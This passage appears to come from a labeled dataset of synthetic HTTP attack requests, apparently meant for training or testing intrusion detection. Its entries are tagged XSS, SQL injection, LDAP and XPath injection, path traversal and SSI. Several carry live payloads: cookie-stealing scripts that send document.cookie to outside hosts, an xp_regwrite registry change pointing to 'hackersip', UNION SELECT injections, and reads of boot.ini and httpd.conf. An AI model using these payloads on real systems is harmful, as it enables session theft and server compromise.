gaueota=578005&JHBHRwbcatf=tp5&0eFoob5mxi=9o&fur=execij

End - Id: 35909
Start - Id: 48335
class: XPathInjection
GET /7tsoi/ePmBhDJnb_zym5jL4/_QW5BC.cgi?snwe=61151&rt=mUQwTtHa4P&r6rm=cq0Iu&Tmsetqehit=790&IyC4hscript=611&i.@odG5=keaohow&cdyshni5S=-eIs&hhsdt9=zeh&danrno1iWfh=openlebrlca%25prcp%27lw8&cvl0twt7nsnecoh=crIm%5Dt&iam=dlwherepobjecthoyTPau%3Df1 HTTP/1.1
Host: 157.131.223.26
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 26481 or    iLeo5o/rb/ntsUi/child::node()[position()=2]   or  691=
Accept-Language: e7-Sfofae2o;q=0.3, cnCp-t6yo
Cache-Control: no-cache
Client-ip: 19.4.211.184
Cookie: iOdsBX=tT82QsCa;ernenuahos=5ap|tn1v
Cookie2: $Version="20"
Date: Wed, 19 Jul 06 22:07:05 CET
ETag: W/"O1taFi5ISjrTvrIqYlx"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 31 May 07 16:24:39 CET
If-Unmodified-Since: Thu, 21 Jul 05 11:30:04 UTC
If-Match: *
If-None-Match: "opVuVTz.OUB@D0otF"
If-Range: Tue, 20 Nov 07 05:08:30 GMT
Max-Forwards: 6
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM c3R4ODZ2bk85aXN0ZXR0d3NlbHUzZHB0bnRocGhkcnRkYXJ6c0RlYmFNcDdu
Authorization: NTLM c3pFZWJndm9oYTdlbmViZHNtbXRwaEdxMHhvc3doZXRkeQ==
Range: 8313-,-86247,250-55725
Referer: http://rurer.gov/arst.php3
TE: deflate;q=0.6,chunked;q=0.0
Trailer: Warning
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 4.5; hn-24; rv:9.0.7) Gecko/58288824
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.7 www.eepet.html, 9.4 www.atteR.css, 1.4 131.212.10.254
Transfer-Encoding: wp4w; VrrtiY=oLhhg
Upgrade: eta/7.4, auRa/8.4
Warning: 165 www.iteoh.html "CyaaaiPnNct5o" "Mon, 03 Apr 06 22:33:02 GMT"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 6875195
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48335
Start - Id: 47322
class: XSS
GET /sFN.js?Dctsy=einclude&RaO=%3Cdiv++++style+%3D%22width%3A++++expression%28%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.atnsicon.com%2Fcgi-bin%2Fie.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B%22%3E&nfdiAerod4te=5623813458&76xeortdemi=37530&n0rj=xgr3nolrR5s2r2&tt9w=9733247&93yhp_9=85&db8a=7&oEtieaaEDxrpE=aIeh HTTP/1.1
Host: www.ab7eSs.gov
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=53417
Client-ip: 188.124.236.19
Cookie: fuoaecNfua7o0=oeDVBA_pA;Loseig=aAei;flli1eanacgioao=ercpVy0rNficerusrzn;9KstdinEF=Eouf;hcfepo=65dK0TZY;psevg8suelivLc=iPoq
Cookie2: $Version="508"
Date: Thu, 21 Dec 06 23:35:04 CET
ETag: W/"@-3igXFzz.XbYHw@rM"
Expect: 100-continue
From: fvc2@eesg.net
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Tue, 12 Apr 05 21:02:59 UTC
If-Match: "@H@xtGbtGY_C7PrO"
If-None-Match: *
If-Range: ".cVulEasZLCbaDOpF"
Max-Forwards: 45
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM Y3RibnJSc2F5bm14ZWxscmJ0c2RVOGlhbm5lck5mZTdvc3RhZHNvZ2Fyb28=
Range: -827060,69-,229-399617
Referer: /tndqm/wkrvo/soM7tes.php3
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: aoce/5.2.3.6
UA-CPU: 68000
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5306x1733
Via: HTTP/6.9 143.80.156.133:160, 7.0 218.73.144.24, FTP/4.4 233.6.139.103
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47322
Start - Id: 45774
class: PathTransversal
GET /nqvvmahqdV/S64enc7tOovocefor.mspx?tan4debqbshn=..........................WINNTsystem.ini&ws2ubwsm8=%5Briel%3Fldscriptf%2Bn%3B0dti HTTP/1.1
Host: www.0op5in.be
Connection: close
Accept: text/*
Accept-Charset: x-mac-ce, windows-874;q=0.7, euc-cn, iso-8859-7;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: jnerh-t, q-rndo;q=0.5, ae3a3e-fen3, rm0n3-fhc
Cache-Control: max-age=22
Client-ip: 79.240.194.64
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="815"
Date: Sat, 18 Nov 06 07:47:45 CET
ETag: "o-Sve-wo4yNnUq.x7"
Expect: iinlwiyi=0scnai;nte9=ye1nacA4
From: a3y5m@itfi.st
If-Modified-Since: Mon, 12 Mar 07 21:43:34 CET
If-Unmodified-Since: Fri, 30 May 08 15:08:07 GMT
If-Match: "gR6NjHSMvf6Amt2HLc3N"
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: Wed, 22 Apr 09 23:05:17 GMT
Max-Forwards: 8
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: NTLM cWxUcmVvc2VlZG9vc2dlZW5saWhwY3V5b0xNYXJkaGxUZXBlZWVndEd2N25oTg==
Range: -500252,934-3694
Referer: http://www.0SMt.it/eidUl/1ueaI.swf
TE: chunked;q=0.9,trailers,trailers
Trailer: Accept-Charset
User-Agent: epeemrdayenal2blN
UA-CPU: StrongARM
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3390x940
Via: 8.3 www.aslmocje.html:2
Transfer-Encoding: identity
Upgrade: auRAi/6.1, wpa/2.1, dH7/6.3, c6nLr/9.1
Warning: 712 www.oljITEeh.gif "uxn4he4amitIWjRw" "Sun, 25 Apr 04 03:24:53 GMT"
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45774
Start - Id: 45954
class: PathTransversal
GET /SMZx/nEXMMtKoP/ete7/S2fromgW/ldwovFPSZdeWpazjbeCj/pGu/u.jm0vrp7.htm?ty=..........................WINNTsystem.ini&cd9dYK=0741&af=Reqne&Isetnnnep62=etetiefls%29drtpvnes HTTP/1.0
Host: www.lgsunu.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: i4nsteel-og, evmw4Tg-Ei1e, u-en, okecux5d-4ckz4, kuo-geora;q=0.8
Cache-Control: no-store
Client-ip: 48.114.132.12
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="235"
Date: Tue, 01 Jan 08 01:04:45 UTC
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Wed, 19 Apr 06 09:42:23 CET
If-Unmodified-Since: Sun, 03 Feb 08 02:15:35 GMT
If-Match: "mReIXtk8AgAk2_n"
If-None-Match: *
If-Range: Fri, 30 Apr 10 21:46:22 GMT
Max-Forwards: 5777
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Referer: http://www.e6ns4.fr/tfi6t2/kklat0M.dll
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 2.2; ee-sc; rv:9.4.5) Gecko/95005726
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: FTP/1.9 238.168.119.29, tnl/6.4 214.16.236.249:2
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45954
Start - Id: 38011
class: LdapInjection
GET /aPyVe77yyMFvofp/yqk/hc5.gif?iOo4eywotu9hjm6=3h%26sxosf&wpyeattonietnm=n%40zv5mBH_TD&thihcrRrm=hsm%29%28%26%28objectClass++++%3D4hnE*%29 HTTP/1.0
Host: www.edhietdes.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: h80cTadu-oo, dhgm-rttwti6o;q=0.5, d-w;q=0.0, tnu6NK-s;q=0.4, 6ir47e-az;q=0.1
Cache-Control: max-age=869
Client-ip: 138.168.151.21
Cookie: cat_GnslYNCAupdate=9ahhnr;rtanas1Rereree=:6ut;ZtUiSG=cJVUu;Fac2Si_wfR=c6iueeednt
Cookie2: $Version="949"
Date: Mon, 18 Jan 10 08:23:56 GMT
ETag: "FpA_UeDHlRzDYzb"
Expect: hh3aseqo=ntaz3t;uStechdt=eaws
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Tue, 20 Oct 09 06:35:53 GMT
If-Match: "ke.s2co_Cxd8Ybz.wm-H"
If-None-Match: "JNS7BBbC4yqqLhkS6I"
If-Range: Wed, 26 Apr 06 24:58:15 GMT
Max-Forwards: 0236
MIME-Version: 9.9
Pragma: dsier=iphxe
Proxy-Authorization: Digest cnonce="uskm"
Authorization: Basic dXdydDozaXNhbg==
Range: 17672-41
Referer: /mhabbli/Twl14R/dsmn.php4
TE: trailers
Trailer: If-None-Match
User-Agent: nemnfdus/8.8.6.8
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 905x8185
Via: FTP/5.8 211.90.80.241
Transfer-Encoding: compress
Upgrade: obs/0.4, gbr/5.8
Warning: 461 www.3izrso.tiff "rrcdd92qh0Axrii" 
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38011
Start - Id: 38023
class: LdapInjection
GET /aidu/zgfAxJW/vdKeB/wmdwsks0ntNO/ri@UbE2boIbf/eB/ex-yuPl5hhbMi2/GH/ao/vhwimt.php4?rs4tlnd3=0864648250&Ws3tseoatuto=1&etc=rgyefsuxe2invnt3&yiz5NeLKs3taal=winntftptow8%26e%26siframe+i&9ZSbJscriptaaccepttmp=%29+++%28%7C++++%28iuams%3Dam9m*%29&05YhWkboot.ini3DY=52424&aa=iaobnevarMcmto4t&Ju7LsX1Ki=+ew%3E&l9e=uihra6pmld&UZUbwl1xselect_=ayx&xusrmwindow.open.10=formrl0d&he=b&rongnwc0cu=9336296 HTTP/1.0
Host: www.lbeHi.fr
Connection: tqiyZw
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, identity;q=0.4, deflate;q=0.7, gzip, deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: arftfei='E61abr7c'
Client-ip: 252.123.213.7
Cookie: a5eorlare9t5di=( syoc[mhm;PjhUZconnectjJservices0z=tu;Ahaving4R=e4-lwSeertka;cselu5=9802822;ai3R=eaoawdtltlrycoi;lmjMbewt=o
Cookie2: $Version="157"
Date: Sat, 02 Dec 06 07:55:37 UTC
ETag: "c@9mSDK4Mtu5MpRA24Q_"
Expect: eaes4=oetnrgT
From: llnexttR@tod6.biz
If-Modified-Since: Fri, 16 Apr 10 13:39:15 CET
If-Unmodified-Since: Sun, 13 Jan 08 22:09:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 06 Mar 04 13:42:52 CET
Max-Forwards: 522
MIME-Version: 8.2
Pragma: oteoit='rauSr'
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: Basic Y2RvOGF0NG46aXN6Y2lF
Range: -044639,-6732
Referer: /bi9esa/uhoo.msf
TE: trailers
Trailer: If-Modified-Since
User-Agent: aletthexreiwymL6
UA-CPU: Sparc
UA-Disp: 2707,126,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.6 129.247.36.140
Transfer-Encoding: deflate
Upgrade: aol/0.7, dxme/6.7, otfplt/6.5
Warning: 045 217.191.56.155:269 "nnydtcF" "Wed, 28 Apr 04 21:59:50 UTC"
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 94095568311644
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38023
Start - Id: 41498
class: SqlInjection
POST /0z-QS7UrHU8processing-instruction/httpPVU4u/ehd1Nl/nun/n9s-LG2/rFDIbLMtXD49H4ashZ/eht.jpg? HTTP/1.0
Content-Length: 340
Content-Language: ia8lf
Content-Encoding: deflate
Content-Location: /uE0a/IieiAhu/cT5a93Am/fs3n.swf
Content-MD5: bUloTnNvMmVMZHJlcnJ3eA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Mar 10 18:36:01 GMT
Last-Modified: Fri, 18 Sep 09 22:14:03 UTC
Host: 250.173.62.122:83978
Connection: close
Accept: application/rtf, video/*, video/*;q=0.7
Accept-Charset: x-mac-hebrew, iso-8859-8-i;q=0.9, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=03
Client-ip: 221.158.6.21
Cookie: smabmitsCni=oIo0fZkmVQL;ZKkROO1openpR=4fs7nyieA;EuNipdGhCybei=dsno1deleteo;meearUthydiiH=uh3e8aDneoei7r;eeiaAwngcarnnfh=ld7S;drtouuzelHae=aemirrlet
Cookie2: $Version="965"
Date: Wed, 20 Apr 05 05:09:35 UTC
ETag: W/"NnRIYgITDhjc.iBg"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Oct 08 05:20:31 GMT
Max-Forwards: 50
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 78-403185
Referer: /rooseuo.nsf
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: hkaih/4.0
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/0.8 www.welddp.shtml, 4.2 169.122.156.182
Transfer-Encoding: compress
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ysdcsr6ikiist=aG565&roCr6= it&t|d?avC7  =&8apea=6i&tssa1hesuocaa=i+&sCP=ijsperlea5asirL&rysnEroamdT=eatq'     UNION    ALL    SELECT    s2isaon FROM   ra     WHERE  ''    =  '&-QQncit7hincludeSsstyle=1ra&uduwatiS=mmmagrehEqafe3eh&shqeherb4cot=N'O&M1RpgCOvarh=9928732432&timjphn=arax&x5QYN9R=049460&Zangodr3hib=53447855

End - Id: 41498
Start - Id: 47622
class: XSS
GET /6XJ.QjcbwM7DLdfsnKEK/9gttehhHnjeh/bcdztl6pn/rtelnwnpesgic/6.MGAkb3Qmp/aitihrfseeWsornu/YSv60aS4G0_j5zr/osdi1cs/m69gVC/81QcV@EZyvCFI/8R9Ev..gif?aUnfwt=216709&Aaunuuvi=aane&wahrshhpIfc=10&uNaI2w=%3Cstyle++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F166.102.30.211%2Ftianie.cfm%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&rrjigrddphuwsEL=59797252&hlxltm=dy0e&d8teh3=vogsefittast1+&8eoyt=wtx&iAmhd1=s%403r HTTP/1.0
Host: www.cterh.ch:80
Connection: auih
Accept: image/*;q=0.3, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, deflate;q=0.0, deflate, compress;q=0.3, gzip;q=0.0
Accept-Language: r47vee-s8epip;q=0.1, nerHThgo-ti
Cache-Control: no-transform
Client-ip: 158.187.180.34
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="8"
Date: Thu, 16 Jul 09 18:56:32 UTC
ETag: "m6-vtplJFQpS.zUxFT"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sun, 24 May 09 12:57:00 GMT
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 Jul 05 19:57:30 UTC
Max-Forwards: 52
MIME-Version: 5.8
Pragma: Yi0eeina='xIphsatb'
Proxy-Authorization: Basic b29iYWU6c3NpdnI=
Authorization: Digest opaque="zfn1lxd"
Range: 393273-
Referer: http://www.qhrsi.it/tareTria.jsp
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: aslustk2DJfirnotnaoe
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: dvo/8.7 www.nhabn.jpg, HTTP/8.2 98.68.186.11, FTP/5.0 www.oS7tcr8a.js
Transfer-Encoding: deflate
Upgrade: piajie/8.1, 2et/2.5, 7inhes/4.8, cdhiar/4.9, 3uyvrn/7.3
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47622
Start - Id: 45622
class: PathTransversal
GET /Bcpassthru_a/9zieMvC.e2Q9U2YVn/twiHEewOqkn3/5JMO.WbetweenfDnc9/HawryWhN/cpcH_JKArRFaTtAf/rSsbEs6merSiherh.shtml?w0r=2%3A%5Cwindows%5Cboot.ini&4k1De-Vov@_=eoOIPinputbf8%2F0wa+ HTTP/1.0
Host: 252.179.71.200
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-jp, x-mac-korean, cp-932;q=0.1, windows-1251;q=0.6
Accept-Encoding: 
Accept-Language: s-g7dst
Cache-Control: only-if-cached
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="11"
Date: Sat, 17 Apr 04 10:58:56 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: seoOtore
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Sat, 28 Jun 08 14:49:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 45
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic dG9pYjU6bG9Ib213Yw==
Authorization: NTLM eWJha3VubWVldmhodGhsZWRpMmVlbG5jajlVbnM4ZWFoVGFzNGUzNG9oOW9ydQ==
Range: 942-,71595-5
Referer: /3itMhtqt/iost7.dll
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Ocfaejd/7.0
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45622
Start - Id: 39556
class: SSI
PUT /r62/le06oea2.jsp? HTTP/1.0
Content-Length: 110
Content-Language: s
Content-Encoding: gzip
Content-Location: http://2dspO.st/ndiWaeiw.asmx
Content-MD5: YlNyZWlycWltZXlkZXBpcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Mon, 10 Jan 05 15:37:22 UTC
Host: 213.8.102.60
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-jp;q=0.1
Accept-Encoding: 
Accept-Language: ml-pdatkfo6;q=0.0, otmn-ftaud;q=0.0, n-nb;q=0.1
Cache-Control: max-stale=97868
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Mon, 22 Mar 04 22:34:47 UTC
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Tue, 01 Jul 08 03:03:35 GMT
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: -29400,128-60803
Referer: http://eindfd.ch/h6R1eioi/nelonnc/va0e4h/eho9nde.jpg
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: yoeansidwg
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: 9.2 101.249.175.32, 0.8 www.ruOivEa.css
Transfer-Encoding: compress
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

elphioeu9tHrbn=d0e=aa:w&wwMhtoeo=<!--   #include   virtual="/etc/httpd/httpd.conf" -->

End - Id: 39556
Start - Id: 41105
class: SqlInjection
GET /aH1lJWSlSQ3NOQVz/nzhfBxZql4Z4m@/u48Hg.srt0/PVYkKservicesNp8COchild.dll?ucE7muts2shmide=q%25uCo&nuteionrt9r=zfbrx8ODIsJ&pdlaApgaeT=813681&PJKZDO-H9jad=0hsbHehSEmUipnscow&T0@Y8=7094&oahnjew=%7E&ose0srEcResk=iksrlttt&uAnKplinkEHeI=exec+++xp_regwrite++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27I8jinrnen%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&wusthKcei=eJTukE HTTP/1.1
Host: www.sAbb.gov
Connection: close
Accept: application/rtf;q=0.7, application/rtf;q=0.4, audio/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.5, deflate, deflate, identity, gzip;q=0.5
Accept-Language: oewsren-atea, Tntre5y-e;q=0.6, lbfIxlel-eadln;q=0.8
Cache-Control: no-cache
Client-ip: 26.15.87.96
Cookie: nsUatrbIeeeh3ah=|wtx;asuumccOrrRutls=a3sAbne;psa=DasietDOsafnit1u;roethSA0w=p5rGjwjcqizQ
Cookie2: $Version="183"
Date: Wed, 05 Sep 07 18:55:34 CET
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ctnineei@15crtioebx.de
If-Modified-Since: Fri, 05 Nov 04 20:47:13 CET
If-Unmodified-Since: Fri, 25 Dec 09 05:50:19 UTC
If-Match: *
If-None-Match: "aKihmhKJiNeeRiCI"
If-Range: *
Max-Forwards: 7609
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: 4a1uo 4pt9hp=4broyo
Range: -397
Referer: http://www.edtsm.gov/h5eaeBi/anl9ogl6.nsf
TE: gzip
Trailer: Accept-Language
User-Agent: cAz0imu0eeh
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: 0.3 254.216.81.43
Transfer-Encoding: proa2
Upgrade: s3t/0.2, css/4.1
Warning: 576 120.182.129.173 "iueomtAstekobodapmTc" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41105
Start - Id: 47288
class: XSS
GET /qDtisHe@Rd9NOkQlZGRz/lqD7WcMEElLBW-/da821hCkaTehio3uS.gif?ezho34sBii=texecwindow.open-thnne9%27&gnAolfa9q=o%24&nwIwmdcnlure=f7u+h+oojcTitcu%3Biew&aenoESh6etru=c%3Cm&r6=444998&CTuhshietlR2=ed%24ied%3A%3CihmtEecztu&ene6oetco=66866&aotoeelafhiadoo=sal6+++++onload%3Djavascript%3A++alert+%28ilhDtodf.aetsdS%29&ih1aetmceasege4=aPcse%24a&dsdil0ahAy06osx=0u+e&Io2cjeee=i HTTP/1.1
Host: www.mecti.com
Connection: ttiLhs
Accept: application/postscript;q=0.9, audio/*;q=0.8
Accept-Charset: cp-932
Accept-Encoding: identity, identity;q=0.7, identity;q=0.5
Accept-Language: h-7gatutec;q=0.1, ibe-ym2trr;q=0.1, tJ0lt-auaihhrn;q=0.2, s4s-a;q=0.3
Cache-Control: only-if-cached
Client-ip: 156.129.47.155
Cookie: eoerD4qyssti=oey4$
Cookie2: $Version="2"
Date: Sat, 25 Feb 06 18:46:30 CET
ETag: W/"jSeqzLUF58FHfui"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Tue, 22 Dec 09 15:20:25 GMT
If-Unmodified-Since: Sun, 07 Dec 08 11:56:45 UTC
If-Match: *
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 7
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest response="A7BB157Bcc54feF1FDD2ccAbdeeDadB0"
Range: -4,7256-5,39-5314
Referer: /ne6osi/eOjten/kSRdl.swf
TE: gzip
Trailer: Accept-Encoding
User-Agent: sulNrait/7.2.2
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 41548117703
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47288
Start - Id: 48174
class: XSS
PUT /iwcCcGXF.asp? HTTP/1.1
Content-Length: 23
Content-Language: atedta,jxteav,lhyAt
Content-Encoding: gzip
Content-Location: http://www.mae1t.net/nap2eno/htBT/otqg/9mso/l3rikoro.cgi
Content-MD5: aU9nZW5kdW5kY3lkMUxveg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Oct 06 04:35:02 UTC
Last-Modified: Wed, 26 Nov 08 17:27:14 CET
Host: 25.243.157.202:28739
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, x-mac-chinesetrad;q=0.8, iso-8859-2, windows-1251
Accept-Encoding: 
Accept-Language: <style><!--</style><script>[document.location.replace ('http://www.ri.com/cgi-bin/veol.cgi'+document.cookie);]//--></script   >
Cache-Control: min-fresh=529
Client-ip: 167.21.97.69
Cookie: amrd=186fV1;FxdropP2h=7496;nstdnscibTrtbsI=758;thesuLaAe=0948763142
Cookie2: $Version="750"
Date: Sun, 03 May 09 20:48:49 UTC
ETag: W/"zIYz-xevdkOvae6U"
Expect: 100-continue
If-Modified-Since: Wed, 24 Nov 04 11:17:59 CET
If-Unmodified-Since: Sat, 01 Mar 08 13:19:29 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 0.7
Pragma: vzn3nfq=dedSpl
Proxy-Authorization: Digest username="Nbcsty"
Range: 252-,4-47,9983-
Referer: http://uilozI7o.gov/ulsa6/dnedt/cehtXas/riti/iabbp.sh
TE: trailers,gzip,deflate;q=0.1
Trailer: Range
